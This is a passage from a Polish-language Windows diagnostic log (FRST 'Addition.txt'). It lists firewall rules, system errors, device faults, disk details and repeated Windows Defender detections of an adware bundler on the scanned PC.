C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation) FirewallRules: [{631CA928-EAEF-437F-A9BE-40A483E0E75E}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{F0DDBECF-16EE-4651-B248-ED5DC683A895}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{64818208-3E0C-4358-8740-171BFE634C39}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation) FirewallRules: [{324E459C-D0DF-44A7-B9CA-3AB111F812D8}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{E342D27F-D9FC-4D8A-A11C-F5A5AA723142}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{33365278-6494-4EBB-AF6B-39D2752E5F29}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation) FirewallRules: [{A86E1DD9-13D7-441E-84FF-D894DDAD1518}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{9BD77420-C354-4628-8BC9-A5831E14C453}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{5461DEF3-3C3A-4B4E-96B7-B1E41ACE79AB}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation) FirewallRules: [{737B4C31-B272-4499-8954-B95D8747B0A7}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{574114B2-D332-44D3-A506-221D4F7DCF46}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{59AD8EFF-6F96-4AE6-9327-5F9BF450C0B7}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation) FirewallRules: [{F5C60B77-8878-45A4-BA56-4223D78A9167}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{30273B23-B785-4AF2-B0D6-27E78BE3FA61}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{46CAC50F-139C-4C45-A084-DB6D8B24A59F}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation) StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe] => Enabled:Spybot - Search & Destroy tray access StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe] => Enabled:Spybot-S&D 2 Scanner Service StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe] => Enabled:Spybot-S&D 2 Updater StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe] => Enabled:Spybot-S&D 2 Background update service ==================== Punkty Przywracania systemu ========================= 13-03-2019 02:44:35 WhiteClick wird entfernt 28-03-2019 11:26:53 Removed NativeDesktopMediaService ==================== Wadliwe urządzenia w Menedżerze urządzeń ============= Name: Security Processor Loader Driver Description: Security Processor Loader Driver Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1} Manufacturer: Service: spldr Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24) Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed. Devices stay in this state if they have been prepared for removal. After you remove the device, this error disappears.Remove the device, and this error should be resolved. Name: sptd Description: sptd Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1} Manufacturer: Service: sptd Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24) Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed. Devices stay in this state if they have been prepared for removal. After you remove the device, this error disappears.Remove the device, and this error should be resolved. ==================== Błędy w Dzienniku zdarzeń: ========================= Dziennik Aplikacja: ================== Error: (03/29/2019 11:15:44 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (03/29/2019 11:10:15 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (03/29/2019 10:28:20 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (03/29/2019 09:34:14 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: Explorer.EXE, wersja: 6.1.7601.17514, sygnatura czasowa: 0x4ce7a144 Nazwa modułu powodującego błąd: SHELL32.dll, wersja: 6.1.7601.23893, sygnatura czasowa: 0x5993136a Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x00000000000503a2 Identyfikator procesu powodującego błąd: 0xa90 Godzina uruchomienia aplikacji powodującej błąd: 0x01d4e604a29abd71 Ścieżka aplikacji powodującej błąd: C:\Windows\Explorer.EXE Ścieżka modułu powodującego błąd: C:\Windows\system32\SHELL32.dll Identyfikator raportu: 6e4577ff-51fd-11e9-9188-d6acf2a6fa87 Error: (03/29/2019 08:58:22 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3002) (User: ZARZĄDZANIE NT) Description: Występująca w rejestrze wartość ciągu objaśniającego licznika wydajności jest niepoprawnie sformatowana. Wadliwie sformułowany ciąg to Liczniki wydajności obiektu WorkflowServiceHost dla usługi przepływów pracy. Pierwszy wpis DWORD w sekcji danych (Data) zawiera wartość indeksu wadliwie sformułowanego ciągu, a drugi i trzeci wpis DWORD w sekcji danych zawiera ostatnie prawidłowe wartości indeksu. Error: (03/29/2019 08:54:15 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (03/28/2019 09:28:10 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: NexusClient.exe, wersja: 0.65.2.0, sygnatura czasowa: 0x5ae0ac02 Nazwa modułu powodującego błąd: KERNELBASE.dll, wersja: 6.1.7601.23915, sygnatura czasowa: 0x59b94f2a Kod wyjątku: 0xe0434352 Przesunięcie błędu: 0x000000000001a06d Identyfikator procesu powodującego błąd: 0xb0c Godzina uruchomienia aplikacji powodującej błąd: 0x01d4e5a3e2e0d1f4 Ścieżka aplikacji powodującej błąd: C:\Program Files\Nexus Mod Manager\NexusClient.exe Ścieżka modułu powodującego błąd: C:\Windows\system32\KERNELBASE.dll Identyfikator raportu: 003a8c22-5198-11e9-a0e8-485b3996a7b2 Error: (03/28/2019 09:28:10 PM) (Source: .NET Runtime) (EventID: 1026) (User: ) Description: Aplikacja: NexusClient.exe Wersja architektury: v4.0.30319 Opis: proces został przerwany z powodu nieobsłużonego wyjątku. Informacje o wyjątku: System.Threading.ThreadAbortException w System.Threading.WaitHandle.WaitOneNative(System.Runtime.InteropServices.SafeHandle, UInt32, Boolean, Boolean) w System.Threading.WaitHandle.InternalWaitOne(System.Runtime.InteropServices.SafeHandle, Int64, Boolean, Boolean) w System.Threading.WaitHandle.WaitOne(Int32, Boolean) w System.Windows.Forms.Control.WaitForWaitHandle(System.Threading.WaitHandle) w System.Windows.Forms.Control.MarshaledInvoke(System.Windows.Forms.Control, System.Delegate, System.Object[], Boolean) w System.Windows.Forms.Control.Invoke(System.Delegate, System.Object[]) w System.Collections.Specialized.NotifyCollectionChangedEventHandler.Invoke(System.Object, System.Collections.Specialized.NotifyCollectionChangedEventArgs) w System.Collections.Specialized.NotifyCollectionChangedEventHandler.Invoke(System.Object, System.Collections.Specialized.NotifyCollectionChangedEventArgs) w Nexus.Client.Util.Collections.ThreadSafeObservableList`1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Add(System.__Canon) w Nexus.Client.ModManagement.InstallationLog.InstallLog+ActiveModRegistry.RegisterMod(Nexus.Client.Mods.IMod, System.String, Boolean) w Nexus.Client.ModManagement.InstallationLog.InstallLog+TransactionEnlistment.Commit() w Nexus.Client.ModManagement.InstallationLog.InstallLog+TransactionEnlistment.Commit(Nexus.Transactions.Enlistment) Informacje o wyjątku: Nexus.Transactions.TransactionException w Nexus.Client.ModManagement.InstallationLog.InstallLog+TransactionEnlistment.Commit(Nexus.Transactions.Enlistment) w Nexus.Transactions.Transaction.Commit() w Nexus.Transactions.TransactionScope.Complete() w Nexus.Client.ModManagement.ModInstaller.RunTasks() w Nexus.Client.Util.Threading.TrackedThread.RunThread() w System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean) w System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean) w System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object) w System.Threading.ThreadHelper.ThreadStart() Dziennik System: ============= Error: (03/29/2019 11:16:11 AM) (Source: Service Control Manager) (EventID: 7003) (User: ) Description: Usługa Intel(R) Management & Security Application User Notification Service zależy od następującej usługi: LMS. Ta usługa może nie być zainstalowana. Error: (03/29/2019 11:14:34 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: Usługa Usługa listy sieci zależy od usługi Rozpoznawanie lokalizacji w sieci, której nie można uruchomić z powodu następującego błędu: Uruchomienie usługi zależności lub grupy nie powiodło się. Error: (03/29/2019 11:14:34 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: Usługa Usługa listy sieci zależy od usługi Rozpoznawanie lokalizacji w sieci, której nie można uruchomić z powodu następującego błędu: Uruchomienie usługi zależności lub grupy nie powiodło się. Error: (03/29/2019 11:14:34 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: Usługa Usługa listy sieci zależy od usługi Rozpoznawanie lokalizacji w sieci, której nie można uruchomić z powodu następującego błędu: Uruchomienie usługi zależności lub grupy nie powiodło się. Error: (03/29/2019 11:14:34 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: Usługa Usługa listy sieci zależy od usługi Rozpoznawanie lokalizacji w sieci, której nie można uruchomić z powodu następującego błędu: Uruchomienie usługi zależności lub grupy nie powiodło się. Error: (03/29/2019 11:14:34 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: Usługa Usługa listy sieci zależy od usługi Rozpoznawanie lokalizacji w sieci, której nie można uruchomić z powodu następującego błędu: Uruchomienie usługi zależności lub grupy nie powiodło się. Error: (03/29/2019 11:14:34 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: Usługa Usługa listy sieci zależy od usługi Rozpoznawanie lokalizacji w sieci, której nie można uruchomić z powodu następującego błędu: Uruchomienie usługi zależności lub grupy nie powiodło się. Error: (03/29/2019 11:14:33 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: Usługa Usługa listy sieci zależy od usługi Rozpoznawanie lokalizacji w sieci, której nie można uruchomić z powodu następującego błędu: Uruchomienie usługi zależności lub grupy nie powiodło się. Windows Defender: =================================== Date: 2019-03-29 11:19:15.984 Description: Podczas skanowania produktu Windows Defender wykryto program szpiegujący lub inne potencjalnie niechciane oprogramowanie. Aby uzyskać więcej informacji, zobacz: http://go.microsoft.com/fwlink/?linkid=37020&name=SoftwareBundler:MSIL/Wizrem&threatid=225135 Nazwa:SoftwareBundler:MSIL/Wizrem Id.:225135 Ważność:Wysoki Kategoria:Program instalujący niezamówione pakiety oprogramowania Znaleziona ścieżka:file:C:\Program Files\Internet Explorer\TUMLJI4H1DI908\6#CçqKuhb1.exe Typ wykrycia:Konkretne Źródło wykrycia:System Stan:Nieznane Użytkownik:ZARZĄDZANIE NT\SYSTEM Nazwa procesu: Date: 2019-03-29 10:34:26.547 Description: Podczas skanowania produktu Windows Defender wykryto program szpiegujący lub inne potencjalnie niechciane oprogramowanie. Aby uzyskać więcej informacji, zobacz: http://go.microsoft.com/fwlink/?linkid=37020&name=SoftwareBundler:MSIL/Wizrem&threatid=225135 Nazwa:SoftwareBundler:MSIL/Wizrem Id.:225135 Ważność:Wysoki Kategoria:Program instalujący niezamówione pakiety oprogramowania Znaleziona ścieżka:file:C:\Program Files\Internet Explorer\TUMLJI4H1DI908\6#CçqKuhb1.exe Typ wykrycia:Konkretne Źródło wykrycia:System Stan:Nieznane Użytkownik:ZARZĄDZANIE NT\SYSTEM Nazwa procesu: Date: 2019-03-29 08:59:45.243 Description: Podczas skanowania produktu Windows Defender wykryto program szpiegujący lub inne potencjalnie niechciane oprogramowanie. Aby uzyskać więcej informacji, zobacz: http://go.microsoft.com/fwlink/?linkid=37020&name=SoftwareBundler:MSIL/Wizrem&threatid=225135 Nazwa:SoftwareBundler:MSIL/Wizrem Id.:225135 Ważność:Wysoki Kategoria:Program instalujący niezamówione pakiety oprogramowania Znaleziona ścieżka:file:C:\Program Files\Internet Explorer\TUMLJI4H1DI908\6#CçqKuhb1.exe Typ wykrycia:Konkretne Źródło wykrycia:System Stan:Nieznane Użytkownik:ZARZĄDZANIE NT\SYSTEM Nazwa procesu: Date: 2019-03-28 21:15:38.872 Description: Podczas skanowania produktu Windows Defender wykryto program szpiegujący lub inne potencjalnie niechciane oprogramowanie. Aby uzyskać więcej informacji, zobacz: http://go.microsoft.com/fwlink/?linkid=37020&name=SoftwareBundler:MSIL/Wizrem&threatid=225135 Nazwa:SoftwareBundler:MSIL/Wizrem Id.:225135 Ważność:Wysoki Kategoria:Program instalujący niezamówione pakiety oprogramowania Znaleziona ścieżka:file:C:\Program Files\Internet Explorer\TUMLJI4H1DI908\6#CçqKuhb1.exe Typ wykrycia:Konkretne Źródło wykrycia:System Stan:Nieznane Użytkownik:ZARZĄDZANIE NT\SYSTEM Nazwa procesu: Date: 2019-03-28 10:47:16.827 Description: Podczas skanowania produktu Windows Defender wykryto program szpiegujący lub inne potencjalnie niechciane oprogramowanie. Aby uzyskać więcej informacji, zobacz: http://go.microsoft.com/fwlink/?linkid=37020&name=SoftwareBundler:MSIL/Wizrem&threatid=225135 Nazwa:SoftwareBundler:MSIL/Wizrem Id.:225135 Ważność:Wysoki Kategoria:Program instalujący niezamówione pakiety oprogramowania Znaleziona ścieżka:file:C:\Program Files\Internet Explorer\TUMLJI4H1DI908\6#CçqKuhb1.exe Typ wykrycia:Konkretne Źródło wykrycia:System Stan:Nieznane Użytkownik:ZARZĄDZANIE NT\SYSTEM Nazwa procesu: CodeIntegrity: =================================== Date: 2015-08-29 14:21:34.603 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Users\user\AppData\Local\Temp\ListOpenedFileDrv_64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2015-08-29 14:21:34.554 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Users\user\AppData\Local\Temp\ListOpenedFileDrv_64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. ==================== Statystyki pamięci =========================== Procesor: Intel(R) Core(TM) i3 CPU 540 @ 3.07GHz Procent pamięci w użyciu: 32% Całkowita pamięć fizyczna: 8119.05 MB Dostępna pamięć fizyczna: 5510.97 MB Całkowita pamięć wirtualna: 8885.24 MB Dostępna pamięć wirtualna: 6390.5 MB ==================== Dyski ================================ Drive c: () (Fixed) (Total:172.69 GB) (Free:34.55 GB) NTFS Drive d: () (Fixed) (Total:292.97 GB) (Free:272.92 GB) NTFS Drive f: (TOSHIBA EXT) (Fixed) (Total:1863.01 GB) (Free:1084.07 GB) NTFS Drive k: (My CDROM) (CDROM) (Total:0.01 GB) (Free:0 GB) CDFS \\?\Volume{cf32c379-6714-11e3-843d-806e6f6e6963}\ (Zastrzeżone przez system) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS ==================== MBR & Tablica partycji ================== ======================================================== Disk: 0 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: F6B1F6B1) Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=172.7 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=293 GB) - (Type=07 NTFS) ======================================================== Disk: 1 (Size: 1863 GB) (Disk ID: D0E96FEA) Partition 1: (Active) - (Size=1863 GB) - (Type=07 NTFS) ==================== Koniec Addition.txt ============================